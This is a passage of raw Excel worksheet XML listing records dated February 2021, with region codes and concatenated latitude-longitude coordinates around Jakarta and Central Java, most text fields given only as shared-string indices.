      </c>
      <c r="V3072" s="5" t="s">
        <v>17215</v>
      </c>
      <c r="W3072" s="5">
        <v>-620867</v>
      </c>
      <c r="X3072" t="s">
        <v>20957</v>
      </c>
      <c r="Y3072" t="str">
        <f t="shared" si="47"/>
        <v>-6.20867,106.90332</v>
      </c>
    </row>
    <row r="3073" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3073">
        <v>254791</v>
      </c>
      <c r="B3073" s="1">
        <v>44245</v>
      </c>
      <c r="C3073" s="2">
        <v>0.33934027777777781</v>
      </c>
      <c r="D3073" t="s">
        <v>22</v>
      </c>
      <c r="E3073" t="s">
        <v>23</v>
      </c>
      <c r="F3073" t="s">
        <v>10368</v>
      </c>
      <c r="G3073" t="s">
        <v>10369</v>
      </c>
      <c r="H3073" t="s">
        <v>26</v>
      </c>
      <c r="I3073" t="s">
        <v>1683</v>
      </c>
      <c r="J3073" t="s">
        <v>2868</v>
      </c>
      <c r="L3073" t="s">
        <v>10370</v>
      </c>
      <c r="M3073">
        <v>3172080001</v>
      </c>
      <c r="N3073">
        <v>3172080</v>
      </c>
      <c r="O3073">
        <v>3172</v>
      </c>
      <c r="P3073">
        <v>31</v>
      </c>
      <c r="Q3073" t="s">
        <v>48</v>
      </c>
      <c r="R3073" t="s">
        <v>141</v>
      </c>
      <c r="S3073" t="s">
        <v>49</v>
      </c>
      <c r="T3073" t="s">
        <v>33</v>
      </c>
      <c r="U3073" s="5">
        <v>10690331</v>
      </c>
      <c r="V3073" s="5" t="s">
        <v>17216</v>
      </c>
      <c r="W3073" s="5">
        <v>-620843</v>
      </c>
      <c r="X3073" t="s">
        <v>20958</v>
      </c>
      <c r="Y3073" t="str">
        <f t="shared" si="47"/>
        <v>-6.20843,106.90331</v>
      </c>
    </row>
    <row r="3074" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3074">
        <v>254792</v>
      </c>
      <c r="B3074" s="1">
        <v>44245</v>
      </c>
      <c r="C3074" s="2">
        <v>0.3399537037037037</v>
      </c>
      <c r="D3074" t="s">
        <v>22</v>
      </c>
      <c r="E3074" t="s">
        <v>23</v>
      </c>
      <c r="F3074" t="s">
        <v>10371</v>
      </c>
      <c r="G3074" t="s">
        <v>10372</v>
      </c>
      <c r="H3074" t="s">
        <v>26</v>
      </c>
      <c r="I3074" t="s">
        <v>2139</v>
      </c>
      <c r="J3074" t="s">
        <v>2868</v>
      </c>
      <c r="L3074" t="s">
        <v>10370</v>
      </c>
      <c r="M3074">
        <v>3172080001</v>
      </c>
      <c r="N3074">
        <v>3172080</v>
      </c>
      <c r="O3074">
        <v>3172</v>
      </c>
      <c r="P3074">
        <v>31</v>
      </c>
      <c r="Q3074" t="s">
        <v>48</v>
      </c>
      <c r="R3074" t="s">
        <v>141</v>
      </c>
      <c r="S3074" t="s">
        <v>49</v>
      </c>
      <c r="T3074" t="s">
        <v>33</v>
      </c>
      <c r="U3074" s="5">
        <v>10690330</v>
      </c>
      <c r="V3074" s="5" t="s">
        <v>17217</v>
      </c>
      <c r="W3074" s="5">
        <v>-620827</v>
      </c>
      <c r="X3074" t="s">
        <v>20228</v>
      </c>
      <c r="Y3074" t="str">
        <f t="shared" si="47"/>
        <v>-6.20827,106.90330</v>
      </c>
    </row>
    <row r="3075" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3075">
        <v>254793</v>
      </c>
      <c r="B3075" s="1">
        <v>44245</v>
      </c>
      <c r="C3075" s="2">
        <v>0.34069444444444441</v>
      </c>
      <c r="D3075" t="s">
        <v>22</v>
      </c>
      <c r="E3075" t="s">
        <v>23</v>
      </c>
      <c r="F3075" t="s">
        <v>10373</v>
      </c>
      <c r="G3075" t="s">
        <v>10374</v>
      </c>
      <c r="H3075" t="s">
        <v>26</v>
      </c>
      <c r="I3075" t="s">
        <v>1542</v>
      </c>
      <c r="J3075" t="s">
        <v>2868</v>
      </c>
      <c r="L3075" t="s">
        <v>10370</v>
      </c>
      <c r="M3075">
        <v>3172080001</v>
      </c>
      <c r="N3075">
        <v>3172080</v>
      </c>
      <c r="O3075">
        <v>3172</v>
      </c>
      <c r="P3075">
        <v>31</v>
      </c>
      <c r="Q3075" t="s">
        <v>48</v>
      </c>
      <c r="R3075" t="s">
        <v>141</v>
      </c>
      <c r="S3075" t="s">
        <v>49</v>
      </c>
      <c r="T3075" t="s">
        <v>33</v>
      </c>
      <c r="U3075" s="5">
        <v>10690330</v>
      </c>
      <c r="V3075" s="5" t="s">
        <v>17217</v>
      </c>
      <c r="W3075" s="5">
        <v>-620827</v>
      </c>
      <c r="X3075" t="s">
        <v>20228</v>
      </c>
      <c r="Y3075" t="str">
        <f t="shared" ref="Y3075:Y3138" si="48">CONCATENATE(X3075,",",V3075)</f>
        <v>-6.20827,106.90330</v>
      </c>
    </row>
    <row r="3076" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3076">
        <v>254798</v>
      </c>
      <c r="B3076" s="1">
        <v>44245</v>
      </c>
      <c r="C3076" s="2">
        <v>0.33940972222222227</v>
      </c>
      <c r="D3076" t="s">
        <v>85</v>
      </c>
      <c r="E3076" t="s">
        <v>23</v>
      </c>
      <c r="F3076" t="s">
        <v>10375</v>
      </c>
      <c r="G3076" t="s">
        <v>10376</v>
      </c>
      <c r="H3076" t="s">
        <v>26</v>
      </c>
      <c r="J3076" t="s">
        <v>2603</v>
      </c>
      <c r="K3076" t="s">
        <v>10377</v>
      </c>
      <c r="L3076" t="s">
        <v>10378</v>
      </c>
      <c r="M3076">
        <v>3174040002</v>
      </c>
      <c r="N3076">
        <v>3174040</v>
      </c>
      <c r="O3076">
        <v>3174</v>
      </c>
      <c r="P3076">
        <v>31</v>
      </c>
      <c r="Q3076" t="s">
        <v>2605</v>
      </c>
      <c r="R3076" t="s">
        <v>377</v>
      </c>
      <c r="S3076" t="s">
        <v>32</v>
      </c>
      <c r="T3076" t="s">
        <v>33</v>
      </c>
      <c r="U3076" s="5">
        <v>10679026</v>
      </c>
      <c r="V3076" s="5" t="s">
        <v>17218</v>
      </c>
      <c r="W3076" s="5">
        <v>-617468</v>
      </c>
      <c r="X3076" t="s">
        <v>19743</v>
      </c>
      <c r="Y3076" t="str">
        <f t="shared" si="48"/>
        <v>-6.17468,106.79026</v>
      </c>
    </row>
    <row r="3077" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3077">
        <v>254806</v>
      </c>
      <c r="B3077" s="1">
        <v>44245</v>
      </c>
      <c r="C3077" s="2">
        <v>0.35496527777777781</v>
      </c>
      <c r="D3077" t="s">
        <v>85</v>
      </c>
      <c r="E3077" t="s">
        <v>23</v>
      </c>
      <c r="F3077" t="s">
        <v>10379</v>
      </c>
      <c r="G3077" t="s">
        <v>10380</v>
      </c>
      <c r="H3077" t="s">
        <v>26</v>
      </c>
      <c r="J3077" t="s">
        <v>778</v>
      </c>
      <c r="K3077" t="s">
        <v>10381</v>
      </c>
      <c r="L3077" t="s">
        <v>10382</v>
      </c>
      <c r="M3077">
        <v>3171070004</v>
      </c>
      <c r="N3077">
        <v>3171070</v>
      </c>
      <c r="O3077">
        <v>3171</v>
      </c>
      <c r="P3077">
        <v>31</v>
      </c>
      <c r="Q3077" t="s">
        <v>121</v>
      </c>
      <c r="R3077" t="s">
        <v>121</v>
      </c>
      <c r="S3077" t="s">
        <v>108</v>
      </c>
      <c r="T3077" t="s">
        <v>33</v>
      </c>
      <c r="U3077" s="5">
        <v>10683015</v>
      </c>
      <c r="V3077" s="5" t="s">
        <v>17219</v>
      </c>
      <c r="W3077" s="5">
        <v>-624126</v>
      </c>
      <c r="X3077" t="s">
        <v>20959</v>
      </c>
      <c r="Y3077" t="str">
        <f t="shared" si="48"/>
        <v>-6.24126,106.83015</v>
      </c>
    </row>
    <row r="3078" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3078">
        <v>254810</v>
      </c>
      <c r="B3078" s="1">
        <v>44245</v>
      </c>
      <c r="C3078" s="2">
        <v>0.35902777777777778</v>
      </c>
      <c r="D3078" t="s">
        <v>2648</v>
      </c>
      <c r="E3078" t="s">
        <v>23</v>
      </c>
      <c r="G3078" t="s">
        <v>10383</v>
      </c>
      <c r="H3078" t="s">
        <v>26</v>
      </c>
      <c r="J3078" t="s">
        <v>10384</v>
      </c>
      <c r="L3078" t="s">
        <v>10385</v>
      </c>
      <c r="M3078">
        <v>3172030005</v>
      </c>
      <c r="N3078">
        <v>3172030</v>
      </c>
      <c r="O3078">
        <v>3172</v>
      </c>
      <c r="P3078">
        <v>31</v>
      </c>
      <c r="Q3078" t="s">
        <v>1256</v>
      </c>
      <c r="R3078" t="s">
        <v>228</v>
      </c>
      <c r="S3078" t="s">
        <v>49</v>
      </c>
      <c r="T3078" t="s">
        <v>33</v>
      </c>
      <c r="U3078" s="5">
        <v>10690767</v>
      </c>
      <c r="V3078" s="5" t="s">
        <v>17220</v>
      </c>
      <c r="W3078" s="5">
        <v>-631979</v>
      </c>
      <c r="X3078" t="s">
        <v>20854</v>
      </c>
      <c r="Y3078" t="str">
        <f t="shared" si="48"/>
        <v>-6.31979,106.90767</v>
      </c>
    </row>
    <row r="3079" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3079">
        <v>254858</v>
      </c>
      <c r="B3079" s="1">
        <v>44245</v>
      </c>
      <c r="C3079" s="2">
        <v>0.41593750000000002</v>
      </c>
      <c r="D3079" t="s">
        <v>22</v>
      </c>
      <c r="E3079" t="s">
        <v>23</v>
      </c>
      <c r="F3079" t="s">
        <v>10386</v>
      </c>
      <c r="G3079" t="s">
        <v>10387</v>
      </c>
      <c r="H3079" t="s">
        <v>26</v>
      </c>
      <c r="I3079" t="s">
        <v>1843</v>
      </c>
      <c r="J3079" t="s">
        <v>1471</v>
      </c>
      <c r="L3079" t="s">
        <v>10388</v>
      </c>
      <c r="M3079">
        <v>3171100001</v>
      </c>
      <c r="N3079">
        <v>3171100</v>
      </c>
      <c r="O3079">
        <v>3171</v>
      </c>
      <c r="P3079">
        <v>31</v>
      </c>
      <c r="Q3079" t="s">
        <v>1474</v>
      </c>
      <c r="R3079" t="s">
        <v>107</v>
      </c>
      <c r="S3079" t="s">
        <v>108</v>
      </c>
      <c r="T3079" t="s">
        <v>33</v>
      </c>
      <c r="U3079" s="5">
        <v>10681724</v>
      </c>
      <c r="V3079" s="5" t="s">
        <v>17221</v>
      </c>
      <c r="W3079" s="5">
        <v>-621865</v>
      </c>
      <c r="X3079" t="s">
        <v>20960</v>
      </c>
      <c r="Y3079" t="str">
        <f t="shared" si="48"/>
        <v>-6.21865,106.81724</v>
      </c>
    </row>
    <row r="3080" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3080">
        <v>254859</v>
      </c>
      <c r="B3080" s="1">
        <v>44245</v>
      </c>
      <c r="C3080" s="2">
        <v>0.4161111111111111</v>
      </c>
      <c r="D3080" t="s">
        <v>22</v>
      </c>
      <c r="E3080" t="s">
        <v>23</v>
      </c>
      <c r="F3080" t="s">
        <v>10389</v>
      </c>
      <c r="G3080" t="s">
        <v>10390</v>
      </c>
      <c r="H3080" t="s">
        <v>26</v>
      </c>
      <c r="I3080" t="s">
        <v>9700</v>
      </c>
      <c r="J3080" t="s">
        <v>1776</v>
      </c>
      <c r="L3080" t="s">
        <v>10391</v>
      </c>
      <c r="M3080">
        <v>3171090004</v>
      </c>
      <c r="N3080">
        <v>3171090</v>
      </c>
      <c r="O3080">
        <v>3171</v>
      </c>
      <c r="P3080">
        <v>31</v>
      </c>
      <c r="Q3080" t="s">
        <v>1074</v>
      </c>
      <c r="R3080" t="s">
        <v>347</v>
      </c>
      <c r="S3080" t="s">
        <v>108</v>
      </c>
      <c r="T3080" t="s">
        <v>33</v>
      </c>
      <c r="U3080" s="5">
        <v>10685848</v>
      </c>
      <c r="V3080" s="5" t="s">
        <v>17222</v>
      </c>
      <c r="W3080" s="5">
        <v>-622608</v>
      </c>
      <c r="X3080" t="s">
        <v>20961</v>
      </c>
      <c r="Y3080" t="str">
        <f t="shared" si="48"/>
        <v>-6.22608,106.85848</v>
      </c>
    </row>
    <row r="3081" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3081">
        <v>254863</v>
      </c>
      <c r="B3081" s="1">
        <v>44245</v>
      </c>
      <c r="C3081" s="2">
        <v>0.41925925925925928</v>
      </c>
      <c r="D3081" t="s">
        <v>22</v>
      </c>
      <c r="E3081" t="s">
        <v>23</v>
      </c>
      <c r="F3081" t="s">
        <v>10392</v>
      </c>
      <c r="G3081" t="s">
        <v>10393</v>
      </c>
      <c r="H3081" t="s">
        <v>26</v>
      </c>
      <c r="I3081" t="s">
        <v>44</v>
      </c>
      <c r="J3081" t="s">
        <v>1471</v>
      </c>
      <c r="L3081" t="s">
        <v>10394</v>
      </c>
      <c r="M3081">
        <v>3171100001</v>
      </c>
      <c r="N3081">
        <v>3171100</v>
      </c>
      <c r="O3081">
        <v>3171</v>
      </c>
      <c r="P3081">
        <v>31</v>
      </c>
      <c r="Q3081" t="s">
        <v>1474</v>
      </c>
      <c r="R3081" t="s">
        <v>107</v>
      </c>
      <c r="S3081" t="s">
        <v>108</v>
      </c>
      <c r="T3081" t="s">
        <v>33</v>
      </c>
      <c r="U3081" s="5">
        <v>10681778</v>
      </c>
      <c r="V3081" s="5" t="s">
        <v>17223</v>
      </c>
      <c r="W3081" s="5">
        <v>-622345</v>
      </c>
      <c r="X3081" t="s">
        <v>20962</v>
      </c>
      <c r="Y3081" t="str">
        <f t="shared" si="48"/>
        <v>-6.22345,106.81778</v>
      </c>
    </row>
    <row r="3082" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3082">
        <v>254864</v>
      </c>
      <c r="B3082" s="1">
        <v>44245</v>
      </c>
      <c r="C3082" s="2">
        <v>0.42015046296296293</v>
      </c>
      <c r="D3082" t="s">
        <v>22</v>
      </c>
      <c r="E3082" t="s">
        <v>23</v>
      </c>
      <c r="F3082" t="s">
        <v>10395</v>
      </c>
      <c r="G3082" t="s">
        <v>10396</v>
      </c>
      <c r="H3082" t="s">
        <v>26</v>
      </c>
      <c r="I3082" t="s">
        <v>8987</v>
      </c>
      <c r="J3082" t="s">
        <v>4337</v>
      </c>
      <c r="L3082" t="s">
        <v>10397</v>
      </c>
      <c r="M3082">
        <v>3171100001</v>
      </c>
      <c r="N3082">
        <v>3171100</v>
      </c>
      <c r="O3082">
        <v>3171</v>
      </c>
      <c r="P3082">
        <v>31</v>
      </c>
      <c r="Q3082" t="s">
        <v>1474</v>
      </c>
      <c r="R3082" t="s">
        <v>107</v>
      </c>
      <c r="S3082" t="s">
        <v>108</v>
      </c>
      <c r="T3082" t="s">
        <v>33</v>
      </c>
      <c r="U3082" s="5">
        <v>10681715</v>
      </c>
      <c r="V3082" s="5" t="s">
        <v>17224</v>
      </c>
      <c r="W3082" s="5">
        <v>-622198</v>
      </c>
      <c r="X3082" t="s">
        <v>20963</v>
      </c>
      <c r="Y3082" t="str">
        <f t="shared" si="48"/>
        <v>-6.22198,106.81715</v>
      </c>
    </row>
    <row r="3083" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3083">
        <v>254952</v>
      </c>
      <c r="B3083" s="1">
        <v>44245</v>
      </c>
      <c r="C3083" s="2">
        <v>0.43055555555555558</v>
      </c>
      <c r="D3083" t="s">
        <v>2648</v>
      </c>
      <c r="E3083" t="s">
        <v>23</v>
      </c>
      <c r="G3083" t="s">
        <v>10398</v>
      </c>
      <c r="H3083" t="s">
        <v>26</v>
      </c>
      <c r="J3083" t="s">
        <v>7725</v>
      </c>
      <c r="L3083" t="s">
        <v>10399</v>
      </c>
      <c r="M3083">
        <v>3175060006</v>
      </c>
      <c r="N3083">
        <v>3175060</v>
      </c>
      <c r="O3083">
        <v>3175</v>
      </c>
      <c r="P3083">
        <v>31</v>
      </c>
      <c r="Q3083" t="s">
        <v>2409</v>
      </c>
      <c r="R3083" t="s">
        <v>2279</v>
      </c>
      <c r="S3083" t="s">
        <v>547</v>
      </c>
      <c r="T3083" t="s">
        <v>33</v>
      </c>
      <c r="U3083" s="5">
        <v>10692666</v>
      </c>
      <c r="V3083" s="5" t="s">
        <v>17225</v>
      </c>
      <c r="W3083" s="5">
        <v>-613031</v>
      </c>
      <c r="X3083" t="s">
        <v>20964</v>
      </c>
      <c r="Y3083" t="str">
        <f t="shared" si="48"/>
        <v>-6.13031,106.92666</v>
      </c>
    </row>
    <row r="3084" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3084">
        <v>254965</v>
      </c>
      <c r="B3084" s="1">
        <v>44245</v>
      </c>
      <c r="C3084" s="2">
        <v>0.52773148148148141</v>
      </c>
      <c r="D3084" t="s">
        <v>22</v>
      </c>
      <c r="E3084" t="s">
        <v>23</v>
      </c>
      <c r="F3084" t="s">
        <v>10400</v>
      </c>
      <c r="G3084" t="s">
        <v>10401</v>
      </c>
      <c r="H3084" t="s">
        <v>26</v>
      </c>
      <c r="I3084" t="s">
        <v>3481</v>
      </c>
      <c r="J3084" t="s">
        <v>2608</v>
      </c>
      <c r="M3084">
        <v>3375010008</v>
      </c>
      <c r="N3084">
        <v>3375010</v>
      </c>
      <c r="O3084">
        <v>3375</v>
      </c>
      <c r="P3084">
        <v>33</v>
      </c>
      <c r="Q3084" t="s">
        <v>10402</v>
      </c>
      <c r="R3084" t="s">
        <v>6337</v>
      </c>
      <c r="S3084" t="s">
        <v>6246</v>
      </c>
      <c r="T3084" t="s">
        <v>1134</v>
      </c>
      <c r="U3084" s="5">
        <v>10967095</v>
      </c>
      <c r="V3084" s="5" t="s">
        <v>17226</v>
      </c>
      <c r="W3084" s="5">
        <v>-689106</v>
      </c>
      <c r="X3084" t="s">
        <v>20965</v>
      </c>
      <c r="Y3084" t="str">
        <f t="shared" si="48"/>
        <v>-6.89106,109.67095</v>
      </c>
    </row>
    <row r="3085" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3085">
        <v>255254</v>
      </c>
      <c r="B3085" s="1">
        <v>44245</v>
      </c>
      <c r="C3085" s="2">
        <v>0.84090277777777789</v>
      </c>
      <c r="D3085" t="s">
        <v>22</v>
      </c>
      <c r="E3085" t="s">
        <v>23</v>
      </c>
      <c r="F3085" t="s">
        <v>10403</v>
      </c>
      <c r="G3085" t="s">
        <v>10404</v>
      </c>
      <c r="H3085" t="s">
        <v>26</v>
      </c>
      <c r="I3085" t="s">
        <v>27</v>
      </c>
      <c r="J3085" t="s">
        <v>2868</v>
      </c>
      <c r="L3085" t="s">
        <v>10405</v>
      </c>
      <c r="M3085">
        <v>3172080001</v>
      </c>
      <c r="N3085">
        <v>3172080</v>
      </c>
      <c r="O3085">
        <v>3172</v>
      </c>
      <c r="P3085">
        <v>31</v>
      </c>
      <c r="Q3085" t="s">
        <v>48</v>
      </c>
      <c r="R3085" t="s">
        <v>141</v>
      </c>
      <c r="S3085" t="s">
        <v>49</v>
      </c>
      <c r="T3085" t="s">
        <v>33</v>
      </c>
      <c r="U3085" s="5">
        <v>10690326</v>
      </c>
      <c r="V3085" s="5" t="s">
        <v>17227</v>
      </c>
      <c r="W3085" s="5">
        <v>-620822</v>
      </c>
      <c r="X3085" t="s">
        <v>20966</v>
      </c>
      <c r="Y3085" t="str">
        <f t="shared" si="48"/>
        <v>-6.20822,106.90326</v>
      </c>
    </row>
    <row r="3086" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3086">
        <v>255261</v>
      </c>
      <c r="B3086" s="1">
        <v>44245</v>
      </c>
      <c r="C3086" s="2">
        <v>0.84513888888888899</v>
      </c>
      <c r="D3086" t="s">
        <v>22</v>
      </c>
      <c r="E3086" t="s">
        <v>23</v>
      </c>
      <c r="F3086" t="s">
        <v>10406</v>
      </c>
      <c r="G3086" t="s">
        <v>10407</v>
      </c>
      <c r="H3086" t="s">
        <v>26</v>
      </c>
      <c r="I3086" t="s">
        <v>137</v>
      </c>
      <c r="J3086" t="s">
        <v>2868</v>
      </c>
      <c r="L3086" t="s">
        <v>10408</v>
      </c>
      <c r="M3086">
        <v>3172080001</v>
      </c>
      <c r="N3086">
        <v>3172080</v>
      </c>
      <c r="O3086">
        <v>3172</v>
      </c>
      <c r="P3086">
        <v>31</v>
      </c>
      <c r="Q3086" t="s">
        <v>48</v>
      </c>
      <c r="R3086" t="s">
        <v>141</v>
      </c>
      <c r="S3086" t="s">
        <v>49</v>
      </c>
      <c r="T3086" t="s">
        <v>33</v>
      </c>
      <c r="U3086" s="5">
        <v>10690329</v>
      </c>
      <c r="V3086" s="5" t="s">
        <v>14989</v>
      </c>
      <c r="W3086" s="5">
        <v>-620851</v>
      </c>
      <c r="X3086" t="s">
        <v>20967</v>
      </c>
      <c r="Y3086" t="str">
        <f t="shared" si="48"/>
        <v>-6.20851,106.90329</v>
      </c>
    </row>
    <row r="3087" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3087">
        <v>255280</v>
      </c>
      <c r="B3087" s="1">
        <v>44245</v>
      </c>
      <c r="C3087" s="2">
        <v>0.86791666666666656</v>
      </c>
      <c r="D3087" t="s">
        <v>22</v>
      </c>
      <c r="E3087" t="s">
        <v>23</v>
      </c>
      <c r="F3087" t="s">
        <v>10409</v>
      </c>
      <c r="G3087" t="s">
        <v>10410</v>
      </c>
      <c r="H3087" t="s">
        <v>26</v>
      </c>
      <c r="I3087" t="s">
        <v>511</v>
      </c>
      <c r="J3087" t="s">
        <v>2845</v>
      </c>
      <c r="L3087" t="s">
        <v>10411</v>
      </c>
      <c r="M3087">
        <v>3172070003</v>
      </c>
      <c r="N3087">
        <v>3172070</v>
      </c>
      <c r="O3087">
        <v>3172</v>
      </c>
      <c r="P3087">
        <v>31</v>
      </c>
      <c r="Q3087" t="s">
        <v>2659</v>
      </c>
      <c r="R3087" t="s">
        <v>128</v>
      </c>
      <c r="S3087" t="s">
        <v>49</v>
      </c>
      <c r="T3087" t="s">
        <v>33</v>
      </c>
      <c r="U3087" s="5">
        <v>10693285</v>
      </c>
      <c r="V3087" s="5" t="s">
        <v>17228</v>
      </c>
      <c r="W3087" s="5">
        <v>-623697</v>
      </c>
      <c r="X3087" t="s">
        <v>20968</v>
      </c>
      <c r="Y3087" t="str">
        <f t="shared" si="48"/>
        <v>-6.23697,106.93285</v>
      </c>
    </row>
    <row r="3088" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3088">
        <v>255284</v>
      </c>
      <c r="B3088" s="1">
        <v>44245</v>
      </c>
      <c r="C3088" s="2">
        <v>0.87025462962962974</v>
      </c>
      <c r="D3088" t="s">
        <v>22</v>
      </c>
      <c r="E3088" t="s">
        <v>23</v>
      </c>
      <c r="F3088" t="s">
        <v>10412</v>
      </c>
      <c r="G3088" t="s">
        <v>10413</v>
      </c>
      <c r="H3088" t="s">
        <v>26</v>
      </c>
      <c r="I3088" t="s">
        <v>882</v>
      </c>
      <c r="J3088" t="s">
        <v>2868</v>
      </c>
      <c r="L3088" t="s">
        <v>10414</v>
      </c>
      <c r="M3088">
        <v>3172080001</v>
      </c>
      <c r="N3088">
        <v>3172080</v>
      </c>
      <c r="O3088">
        <v>3172</v>
      </c>
      <c r="P3088">
        <v>31</v>
      </c>
      <c r="Q3088" t="s">
        <v>48</v>
      </c>
      <c r="R3088" t="s">
        <v>141</v>
      </c>
      <c r="S3088" t="s">
        <v>49</v>
      </c>
      <c r="T3088" t="s">
        <v>33</v>
      </c>
      <c r="U3088" s="5">
        <v>10690320</v>
      </c>
      <c r="V3088" s="5" t="s">
        <v>17229</v>
      </c>
      <c r="W3088" s="5">
        <v>-620849</v>
      </c>
      <c r="X3088" t="s">
        <v>20969</v>
      </c>
      <c r="Y3088" t="str">
        <f t="shared" si="48"/>
        <v>-6.20849,106.90320</v>
      </c>
    </row>
    <row r="3089" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3089">
        <v>255303</v>
      </c>
      <c r="B3089" s="1">
        <v>44245</v>
      </c>
      <c r="C3089" s="2">
        <v>0.88856481481481486</v>
      </c>
      <c r="D3089" t="s">
        <v>22</v>
      </c>
      <c r="E3089" t="s">
        <v>23</v>
      </c>
      <c r="F3089" t="s">
        <v>10415</v>
      </c>
      <c r="G3089" t="s">
        <v>10416</v>
      </c>
      <c r="H3089" t="s">
        <v>26</v>
      </c>
      <c r="I3089" t="s">
        <v>137</v>
      </c>
      <c r="J3089" t="s">
        <v>10417</v>
      </c>
      <c r="L3089" t="s">
        <v>10418</v>
      </c>
      <c r="M3089">
        <v>3172070004</v>
      </c>
      <c r="N3089">
        <v>3172070</v>
      </c>
      <c r="O3089">
        <v>3172</v>
      </c>
      <c r="P3089">
        <v>31</v>
      </c>
      <c r="Q3089" t="s">
        <v>2880</v>
      </c>
      <c r="R3089" t="s">
        <v>128</v>
      </c>
      <c r="S3089" t="s">
        <v>49</v>
      </c>
      <c r="T3089" t="s">
        <v>33</v>
      </c>
      <c r="U3089" s="5">
        <v>10694063</v>
      </c>
      <c r="V3089" s="5" t="s">
        <v>17230</v>
      </c>
      <c r="W3089" s="5">
        <v>-622822</v>
      </c>
      <c r="X3089" t="s">
        <v>20970</v>
      </c>
      <c r="Y3089" t="str">
        <f t="shared" si="48"/>
        <v>-6.22822,106.94063</v>
      </c>
    </row>
    <row r="3090" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3090">
        <v>255310</v>
      </c>
      <c r="B3090" s="1">
        <v>44245</v>
      </c>
      <c r="C3090" s="2">
        <v>0.89427083333333324</v>
      </c>
      <c r="D3090" t="s">
        <v>22</v>
      </c>
      <c r="E3090" t="s">
        <v>23</v>
      </c>
      <c r="F3090" t="s">
        <v>10419</v>
      </c>
      <c r="G3090" t="s">
        <v>10420</v>
      </c>
      <c r="H3090" t="s">
        <v>26</v>
      </c>
      <c r="I3090" t="s">
        <v>5330</v>
      </c>
      <c r="J3090" t="s">
        <v>3184</v>
      </c>
      <c r="L3090" t="s">
        <v>10421</v>
      </c>
      <c r="M3090">
        <v>3172070007</v>
      </c>
      <c r="N3090">
        <v>3172070</v>
      </c>
      <c r="O3090">
        <v>3172</v>
      </c>
      <c r="P3090">
        <v>31</v>
      </c>
      <c r="Q3090" t="s">
        <v>3186</v>
      </c>
      <c r="R3090" t="s">
        <v>128</v>
      </c>
      <c r="S3090" t="s">
        <v>49</v>
      </c>
      <c r="T3090" t="s">
        <v>33</v>
      </c>
      <c r="U3090" s="5">
        <v>10690309</v>
      </c>
      <c r="V3090" s="5" t="s">
        <v>15623</v>
      </c>
      <c r="W3090" s="5">
        <v>-621836</v>
      </c>
      <c r="X3090" t="s">
        <v>20971</v>
      </c>
      <c r="Y3090" t="str">
        <f t="shared" si="48"/>
        <v>-6.21836,106.90309</v>
      </c>
    </row>
    <row r="3091" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3091">
        <v>255311</v>
      </c>
      <c r="B3091" s="1">
        <v>44245</v>
      </c>
      <c r="C3091" s="2">
        <v>0.89459490740740744</v>
      </c>
      <c r="D3091" t="s">
        <v>22</v>
      </c>
      <c r="E3091" t="s">
        <v>23</v>
      </c>
      <c r="F3091" t="s">
        <v>10422</v>
      </c>
      <c r="G3091" t="s">
        <v>10423</v>
      </c>
      <c r="H3091" t="s">
        <v>26</v>
      </c>
      <c r="I3091" t="s">
        <v>517</v>
      </c>
      <c r="J3091" t="s">
        <v>2868</v>
      </c>
      <c r="L3091" t="s">
        <v>10424</v>
      </c>
      <c r="M3091">
        <v>3172080001</v>
      </c>
      <c r="N3091">
        <v>3172080</v>
      </c>
      <c r="O3091">
        <v>3172</v>
      </c>
      <c r="P3091">
        <v>31</v>
      </c>
      <c r="Q3091" t="s">
        <v>48</v>
      </c>
      <c r="R3091" t="s">
        <v>141</v>
      </c>
      <c r="S3091" t="s">
        <v>49</v>
      </c>
      <c r="T3091" t="s">
        <v>33</v>
      </c>
      <c r="U3091" s="5">
        <v>10690369</v>
      </c>
      <c r="V3091" s="5" t="s">
        <v>15243</v>
      </c>
      <c r="W3091" s="5">
        <v>-620816</v>
      </c>
      <c r="X3091" t="s">
        <v>20972</v>
      </c>
      <c r="Y3091" t="str">
        <f t="shared" si="48"/>
        <v>-6.20816,106.90369</v>
      </c>
    </row>
    <row r="3092" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3092">
        <v>255324</v>
      </c>
      <c r="B3092" s="1">
        <v>44245</v>
      </c>
      <c r="C3092" s="2">
        <v>0.8847222222222223</v>
      </c>
      <c r="D3092" t="s">
        <v>2648</v>
      </c>
      <c r="E3092" t="s">
        <v>23</v>
      </c>
      <c r="G3092" t="s">
        <v>10425</v>
      </c>
      <c r="H3092" t="s">
        <v>26</v>
      </c>
      <c r="J3092" t="s">
        <v>10426</v>
      </c>
      <c r="L3092" t="s">
        <v>10427</v>
      </c>
      <c r="M3092">
        <v>3172070003</v>
      </c>
      <c r="N3092">
        <v>3172070</v>
      </c>
      <c r="O3092">
        <v>3172</v>
      </c>
      <c r="P3092">
        <v>31</v>
      </c>
      <c r="Q3092" t="s">
        <v>2659</v>
      </c>
      <c r="R3092" t="s">
        <v>128</v>
      </c>
      <c r="S3092" t="s">
        <v>49</v>
      </c>
      <c r="T3092" t="s">
        <v>33</v>
      </c>
      <c r="U3092" s="5">
        <v>10693987</v>
      </c>
      <c r="V3092" s="5" t="s">
        <v>17231</v>
      </c>
      <c r="W3092" s="5">
        <v>-625085</v>
      </c>
      <c r="X3092" t="s">
        <v>20973</v>
      </c>
      <c r="Y3092" t="str">
        <f t="shared" si="48"/>
        <v>-6.25085,106.93987</v>
      </c>
    </row>
    <row r="3093" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3093">
        <v>255329</v>
      </c>
      <c r="B3093" s="1">
        <v>44245</v>
      </c>
      <c r="C3093" s="2">
        <v>0.91108796296296291</v>
      </c>
